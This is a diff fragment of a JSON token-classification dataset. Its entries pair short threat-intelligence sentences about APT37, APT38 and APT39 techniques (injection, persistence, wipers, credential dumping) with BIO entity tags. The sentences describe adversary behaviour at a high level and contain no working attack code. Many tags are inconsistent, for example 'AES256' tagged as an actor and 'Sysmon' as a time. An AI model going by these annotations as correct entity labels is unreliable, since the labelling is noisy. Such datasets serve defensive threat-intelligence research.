"(Shenzhen)", + "Company", + "Limited.”" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "sent", + "spearphishing", + "attachments", + "attempting", + "to", + "get", + "a", + "user", + "to", + "open", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "leverages", + "the", + "Windows", + "API", + "calls:", + "VirtualAlloc(),", + "WriteProcessMemory(),", + "and", + "CreateRemoteThread()", + "for", + "process", + "injection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "obfuscates", + "strings", + "and", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "a", + "Bluetooth", + "device", + "harvester,", + "which", + "uses", + "Windows", + "Bluetooth", + "APIs", + "to", + "find", + "information", + "on", + "connected", + "Bluetooth", + "devices." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37's", + "Freenki", + "malware", + "lists", + "running", + "processes", + "using", + "the", + "Microsoft", + "Windows", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "injects", + "its", + "malware", + "variant,", + "ROKRAT,", + "into", + "the", + "cmd.exe", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "Python", + "scripts", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37's", + "has", + "added", + "persistence", + "via", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT37", + "has", + "created", + "scheduled", + "tasks", + "to", + "run", + "malicious", + "scripts", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "delivers", + "malware", + "using", + "spearphishing", + "emails", + "with", + "malicious", + "HWP", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT37", + "uses", + "steganography", + "to", + "send", + "images", + "to", + "users", + "that", + "are", + "embedded", + "with", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "collects", + "the", + "computer", + "name,", + "the", + "BIOS", + "model,", + "and", + "execution", + "path." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "identifies", + "the", + "victim", + "username." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "malware", + "that", + "will", + "issue", + "the", + "command", + "<code>shutdown", + "/r", + "/t", + "1</code>", + "to", + "reboot", + "a", + "system", + "after", + "wiping", + "its", + "MBR." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "executes", + "shellcode", + "and", + "a", + "VBA", + "script", + "to", + "decode", + "Base64", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "uses", + "HTTPS", + "to", + "conceal", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "collected", + "browser", + "bookmark", + "information", + "to", + "learn", + "more", + "about", + "compromised", + "hosts,", + "obtain", + "personal", + "information", + "about", + "users,", + "and", + "acquire", + "details", + "about", + "internal", + "network", + "resources." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "brute", + "force", + "techniques", + "to", + "attempt", + "account", + "access", + "when", + "passwords", + "are", + "unknown", + "or", + "when", + "password", + "hashes", + "are", + "unavailable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "clears", + "Window", + "Event", + "logs", + "and", + "Sysmon", + "logs", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "used", + "a", + "Trojan", + "called", + "KEYLIME", + "to", + "collect", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "CHM", + "files", + "to", + "move", + "concealed", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "cron", + "to", + "create", + "pre-scheduled", + "and", + "periodic", + "background", + "jobs", + "on", + "a", + "Linux", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "a", + "custom", + "secure", + "delete", + "function", + "to", + "make", + "deleted", + "files", + "unrecoverable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "Hermes", + "ransomware", + "to", + "encrypt", + "files", + "with", + "AES256." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "APT38", + "has", + "collected", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "have", + "created", + "firewall", + "exemptions", + "on", + "specific", + "ports,", + "including", + "ports", + "443,", + "6443,", + "8443,", + "and", + "9443." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "a", + "custom", + "MBR", + "wiper", + "named", + "BOOTWRECK", + "to", + "render", + "systems", + "inoperable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "conducted", + "watering", + "holes", + "schemes", + "to", + "gain", + "initial", + "access", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "a", + "utility", + "called", + "CLOSESHAVE", + "that", + "can", + "securely", + "delete", + "a", + "file", + "from", + "the", + "system.", + "They", + "have", + "also", + "removed", + "malware,", + "tools,", + "or", + "other", + "non-native", + "files", + "used", + "during", + "the", + "intrusion", + "to", + "reduce", + "their", + "footprint", + "or", + "as", + "part", + "of", + "the", + "post-intrusion", + "cleanup", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "have", + "enumerated", + "files", + "and", + "directories,", + "or", + "searched", + "in", + "specific", + "locations", + "within", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "prepended", + "a", + "space", + "to", + "all", + "of", + "their", + "terminal", + "commands", + "to", + "operate", + "without", + "leaving", + "traces", + "in", + "the", + "HISTCONTROL", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT38", + "used", + "a", + "backdoor,", + "NESTEGG,", + "that", + "has", + "the", + "capability", + "to", + "download", + "and", + "upload", + "files", + "to", + "and", + "from", + "a", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "used", + "a", + "Trojan", + "called", + "KEYLIME", + "to", + "capture", + "keystrokes", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "enabling", + "malicious", + "macros", + "within", + "email", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "APT38", + "uses", + "a", + "tool", + "called", + "CLEANTOAD", + "that", + "has", + "the", + "capability", + "to", + "modify", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "the", + "Windows", + "API", + "to", + "execute", + "code", + "within", + "a", + "victim's", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "enumerated", + "network", + "shares", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "PowerShell", + "to", + "execute", + "commands", + "and", + "other", + "operational", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "leveraged", + "Sysmon", + "to", + "understand", + "the", + "processes,", + "services", + "in", + "the", + "organization." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "binaries,", + "scripts,", + "and", + "Control", + "Panel", + "Item", + "files", + "and", + "to", + "execute", + "code", + "via", + "proxy", + "to", + "avoid", + "triggering", + "security", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "DYEPACK.FOX", + "to", + "manipulate", + "PDF", + "data", + "as", + "it", + "is", + "accessed", + "to", + "remove", + "traces", + "of", + "fraudulent", + "SWIFT", + "transactions", + "from", + "the", + "data", + "displayed", + "to", + "the", + "end", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "Task", + "Scheduler", + "to", + "run", + "programs", + "at", + "system", + "startup", + "or", + "on", + "a", + "scheduled", + "basis", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "identified", + "security", + "software,", + "configurations,", + "defensive", + "tools,", + "and", + "sensors", + "installed", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "created", + "new", + "services", + "or", + "modified", + "existing", + "ones", + "to", + "run", + "executables,", + "commands,", + "or", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "several", + "code", + "packing", + "methods", + "such", + "as", + "Themida,", + "Enigma,", + "VMProtect,", + "and", + "Obsidium,", + "to", + "pack", + "their", + "implants." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "conducted", + "spearphishing", + "campaigns", + "using", + "malicious", + "email", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "B-Tool", + "B-Tool" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "DYEPACK", + "to", + "create,", + "delete,", + "and", + "alter", + "records", + "in", + "databases", + "used", + "for", + "SWIFT", + "transactions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "attempted", + "to", + "get", + "detailed", + "information", + "about", + "a", + "compromised", + "host,", + "including", + "the", + "operating", + "system,", + "version,", + "patches,", + "hotfixes,", + "and", + "service", + "packs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "installed", + "a", + "port", + "monitoring", + "tool,", + "MAPMAKER,", + "to", + "print", + "the", + "active", + "TCP", + "connections", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "identified", + "primary", + "users,", + "currently", + "logged", + "in", + "users,", + "sets", + "of", + "users", + "that", + "commonly", + "use", + "a", + "system,", + "or", + "inactive", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "a", + "custom", + "MBR", + "wiper", + "named", + "BOOTWRECK,", + "which", + "will", + "initiate", + "a", + "system", + "reboot", + "after", + "wiping", + "the", + "victim's", + "MBR." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "modified", + "data", + "timestamps", + "to", + "mimic", + "files", + "that", + "are", + "in", + "the", + "same", + "folder", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "such", + "as", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "DYEPACK", + "to", + "manipulate", + "SWIFT", + "messages", + "en", + "route", + "to", + "a", + "printer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "VBScript", + "to", + "execute", + "commands", + "and", + "other", + "operational", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "used", + "a", + "backdoor,", + "QUICKRIDE,", + "to", + "communicate", + "to", + "the", + "C2", + "server", + "over", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "web", + "shells", + "for", + "persistence", + "or", + "to", + "ensure", + "redundant", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "used", + "a", + "command-line", + "tunneler,", + "NACHOCHEESE,", + "to", + "give", + "them", + "shell", + "access", + "to", + "a", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT38", + "has", + "installed", + "a", + "new", + "Windows", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "malware", + "to", + "set", + "<code>LoadAppInit_DLLs</code>", + "in", + "the", + "Registry", + "key", + "<code>SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows</code>", + "in", + "order", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "WinRAR", + "and", + "7-Zip", + "to", + "compress", + "an", + "archive", + "stolen", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "utilized", + "AutoIt", + "malware", + "scripts", + "embedded", + "in", + "Microsoft", + "Office", + "documents", + "or", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "the", + "BITS", + "protocol", + "to", + "exfiltrate", + "stolen", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "communicated", + "with", + "C2", + "through", + "files", + "uploaded", + "to", + "and", + "downloaded", + "from", + "DropBox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "Ncrack", + "to", + "reveal", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "tools", + "capable", + "of", + "stealing", + "contents", + "of", + "the", + "clipboard." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "malware", + "to", + "turn", + "off", + "the", + "<code>RequireSigned</code>", + "feature", + "which", + "ensures", + "only", + "signed", + "DLLs", + "can", + "be", + "run", + "on", + "Windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "utilized", + "custom", + "scripts", + "to", + "perform", + "internal", + "reconnaissance." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "the", + "Smartftp", + "Password", + "Decryptor", + "tool", + "to", + "decrypt", + "FTP", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "remote", + "access", + "tools", + "that", + "leverage", + "DNS", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "various", + "tools", + "to", + "steal", + "files", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "malware", + "to", + "decrypt", + "encrypted", + "CAB", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "malware", + "to", + "drop", + "encrypted", + "CAB", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "exfiltrated", + "stolen", + "victim", + "data", + "through", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "SQL", + "injection", + "for", + "initial", + "compromise." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "various", + "tools", + "to", + "proxy", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "malware", + "to", + "delete", + "files", + "after", + "they", + "are", + "deployed", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "tools", + "with", + "the", + "ability", + "to", + "search", + "for", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "downloaded", + "tools", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "utilized", + "tools", + "to", + "capture", + "mouse", + "movements." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "APT39", + "used", + "custom", + "tools", + "to", + "create", + "SOCK5", + "and", + "custom", + "protocol", + "proxies", + "between", + "infected", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "tools", + "for", + "capturing", + "keystrokes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "Mimikatz,", + "Windows", + "Credential", + "Editor", + "and", + "ProcDump", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "created", + "accounts", + "on", + "multiple", + "compromised", + "hosts", + "to", + "perform", + "actions", + "within", + "the", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "utilized", + "tools", + "to", + "aggregate", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "sent", + "spearphishing", + "emails", + "in", + "an", + "attempt", + "to", + "lure", + "users", + "to", + "click", + "on", + "a", + "malicious", + "attachment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "sent", + "spearphishing", + "emails", + "in", + "an", + "attempt", + "to", + "lure", + "users", + "to", + "click", + "on", + "a", + "malicious", + "link." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "malware", + "disguised", + "as", + "Mozilla", + "Firefox", + "and", + "a", + "tool", + "named", + "mfevtpse.exe", + "to", + "proxy", + "C2", + "communications,", + "closely", + "mimicking", + "a", + "legitimate", + "McAfee", + "file", + "mfevtps.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "CrackMapExec", + "and", + "a", + "custom", + "port", + "scanner", + "known", + "as", + "BLUETORCH", + "for", + "network", + "scanning." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "the", + "post", + "exploitation", + "tool", + "CrackMapExec", + "to", + "enumerate", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + 